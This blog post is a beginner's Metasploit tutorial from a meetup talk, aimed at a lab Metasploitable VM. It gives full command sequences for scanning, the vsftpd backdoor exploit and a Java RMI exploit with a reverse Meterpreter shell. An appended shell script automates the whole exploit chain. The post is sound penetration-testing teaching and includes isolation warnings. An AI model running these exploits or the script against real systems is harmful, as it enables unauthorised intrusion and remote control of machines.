This post is a quick rundown of a talk that I gave at my local information security meetup to introduce the Metasploit Framework to those who have not used it before.
So what is Metasploit?
Metasploit is an exploitation framework: a collection of tools to help develop exploits and use them against targets. It was created in 2003 by H. D. Moore.
The Metasploit project was purchased by Rapid7 in 2009.
Originally written in Perl, it has since been rewritten in Ruby. It comes in two main flavours: the open-source Framework and the commercial Pro edition.
While there are many tools in the Metasploit Framework, today we will only be using msfconsole. Inside msfconsole there are four main types of module.
Auxiliary modules hold all sorts of things that don't really fit into the other categories. This is where we find the scanners we use to enumerate the target for vulnerabilities.
Exploit modules are, yes you guessed it, where we find the exploits that use known vulnerabilities to break into a target machine. As of writing this there are over 1500 exploits in Metasploit.
A payload is the code that we have the target run once an exploit succeeds. Generally this is how we get shell access.
Post modules let us gather information about the target and its environment once it has been exploited. This lets us collect more intelligence for privilege escalation and for finding more targets.
Meterpreter is a special payload that gives us higher-level access to the target. With it we can upload and download files, interact with the target's file system and do lots more.
We will see an example of its usage a little later on.
With the old saying "Hackers be lazy" in mind, we can take a leaf out of their book and install a Kali image, which comes with Metasploit pre-installed and ready to go. This will save a lot of time trying to get the setup just right. For a target, the examples below use a Metasploitable VM.
Please make sure that these VMs aren't publicly accessible. Metasploitable is deliberately vulnerable, so put both machines on a host-only or internal virtual network rather than bridging them onto a real LAN.
If you have the ability to take a snapshot with your virtualisation software now is the time to do so.
Before starting Metasploit we must initialise the database. To do this, type msfdb init into the terminal window. Then start msfconsole by typing msfconsole into your terminal.
First up, port scanning. You can use nmap or db_nmap; the only difference between the two is that db_nmap saves the output into the Metasploit database for you to query later.
db_nmap -T4 -A -v 172.16.1.142
This shows us that there is a truckload of ports open.
Using the services command we can query the database to see which ports are open.
From this list of services we can see that Samba is running. Let us enumerate the Samba shares.
Enter use auxiliary/scanner/smb/smb_enumshares into msfconsole.
We can see what options this module requires by entering show options.
The target's IP address is set with set RHOSTS 172.16.1.142 (in my case). The easy way to find the IP address of your target is to log in to the Metasploitable machine as msfadmin:msfadmin and then run ifconfig.
To execute the module enter run.
Once we have done our recon it is time to break in.
As we can see from the list of services, the target is running an FTP daemon, vsftpd 2.3.4 to be exact.
We can do a quick search to see if we have an exploit for that version by typing in search vsftpd.
Oh nice, there is one. To load it, type use followed by the module path shown in the search results.
Same as with the scanner, we set the target's IP:
set RHOST 172.16.1.142
To see what payloads we can use with this exploit, enter show payloads.
To use the payload enter
set PAYLOAD cmd/unix/interact
We can check whether the payload has any options we need to set by entering show options.
To execute the exploit, enter exploit.
There we have it, command execution on the target.
Let us try another exploit.
As we know from the services command, there are lots of interesting services running. One that caught my eye was the Java RMI registry service.
I happen to know that this is exploitable. To use the exploit, enter
use exploit/multi/misc/java_rmi_server and look at its options with show options.
There are a few more options that I need to set this time around, as my attack machine has multiple IP addresses. I need to
set RHOST 172.16.1.142 and set the local address that the module's own server listens on:
set SRVHOST 172.16.1.138
This has to be an address the target can actually reach, because the exploit works by making the target load a class from a server we host.
This time we are going to use the Meterpreter payload:
set PAYLOAD java/meterpreter/reverse_tcp
This payload requires two options: LHOST, the IP address of the attack machine that the target needs to connect back to (on a multi-homed box pick the one the target can route to, just as with SRVHOST), and LPORT, the port to use.
Again, to execute the exploit, type in exploit.
As you can see, we have successfully exploited the target, but how do we interact with it? The exploit has called us back with a Meterpreter session and put that session into the background.
To list your sessions enter sessions -l,
and to interact with the first one enter
sessions -i 1
Now we are in the Meterpreter session. We can interact with the target and even drop into a system shell with the shell command.
There is a lot more that can be done with Meterpreter; please read up on what it offers.
To leave the Meterpreter session running and get back to the msfconsole prompt, type background (exit would close the session, and we still need it for the next step).
Now that we have exploited the system and have a session, it is time to gather more intelligence.
We attach a post module to an active session by setting its SESSION option to the session number, set SESSION 1 here.
As with the auxiliary modules, enter run to execute it.
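To tie the whole walkthrough together, here is an added example (mine, not code from the original post or from the Metasploit project) that runs the same sequence non-interactively with a Metasploit resource script handed to msfconsole -r. It assumes a Linux attack box with iproute2 (ip route get) and msfconsole on PATH, the target address 172.16.1.142 from above, a hypothetical MSF_TARGET environment variable as the trigger, and the module path exploit/unix/ftp/vsftpd_234_backdoor for the vsftpd exploit, which you should confirm against your own search vsftpd output. The useful bit is lhost_for_target: on a machine with several addresses it derives SRVHOST and LHOST from the kernel's route to the target, the value that had to be worked out by hand above.

```shell
#!/bin/sh
# Added example (not from the original post): drive the walkthrough
# non-interactively with a Metasploit resource script. Assumes a Linux attack
# box with iproute2 and msfconsole on PATH. The vsftpd module path below is an
# assumption taken from `search vsftpd`; confirm it on your own install.

# Pull the source address out of `ip route get <target>` output, e.g.
# "172.16.1.142 dev eth1 src 172.16.1.138 uid 1000". Takes the text as an
# argument so it can be checked against a sample without a network.
src_addr_from_route() {
    printf '%s\n' "$1" |
        awk '{ for (i = 1; i <= NF; i++) if ($i == "src") { print $(i + 1); exit } }'
}

# The local address that actually faces the target: the right value for both
# SRVHOST and LHOST on a multi-homed attack machine.
lhost_for_target() {
    src_addr_from_route "$(ip route get "$1" 2>/dev/null)"
}

# Cheap sanity check so a typo does not become RHOSTS for the whole run.
is_ipv4() {
    printf '%s\n' "$1" | awk -F. '
        NF == 4 { for (i = 1; i <= 4; i++) if ($i !~ /^[0-9]+$/ || $i > 255) exit 1; exit 0 }
        { exit 1 }'
}

# Emit the resource script: scan into the database, enumerate SMB shares, then
# the two exploits from the post. "exploit -z" does not drop into a new session,
# so the script carries on; every listener is bound to the interface that
# routes to the target.
build_rc() {
    target=$1
    lhost=$2
    cat <<EOF
workspace -a meetup
db_nmap -T4 -A -v $target
services
use auxiliary/scanner/smb/smb_enumshares
set RHOSTS $target
run
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST $target
set PAYLOAD cmd/unix/interact
exploit -z
use exploit/multi/misc/java_rmi_server
set RHOST $target
set SRVHOST $lhost
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT 4444
exploit -z
sessions -l
EOF
}

main() {
    target=$1
    is_ipv4 "$target" || { echo "not an IPv4 address: $target" >&2; return 1; }
    lhost=$(lhost_for_target "$target")
    [ -n "$lhost" ] || { echo "no route to $target" >&2; return 1; }
    rc=$(mktemp)
    build_rc "$target" "$lhost" > "$rc"
    echo "resource script written to $rc (LHOST/SRVHOST = $lhost)" >&2
    msfconsole -q -r "$rc"
}

# Only launch when a target is given (MSF_TARGET is a name chosen for this
# example), so the helpers above can also be sourced and used on their own.
if [ -n "${MSF_TARGET-}" ]; then
    main "$MSF_TARGET"
fi
```

Run it as MSF_TARGET=172.16.1.142 sh msf_run.sh from the Kali box. The sessions -l at the end of the script shows what came back; from there sessions -i and the post modules work exactly as in the interactive walkthrough. Only ever point this at a lab target you own.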
This is as far as we are going today and I’ll leave it up to you what to do next.
Beyond the Framework
If the Metasploit Framework isn't enough for you then check out the following:
Metasploit Pro, the commercial edition, adds more power on top of the Framework.
Armitage - http://www.fastandeasyhacking.com/ (included in Kali) is an open-source point-and-click front end for the Framework.
Cobalt Strike https://www.cobaltstrike.com/ is a commercial point-and-click tool.
There is so much more to Metasploit, and if you want to know a little more go and check out these awesome resources: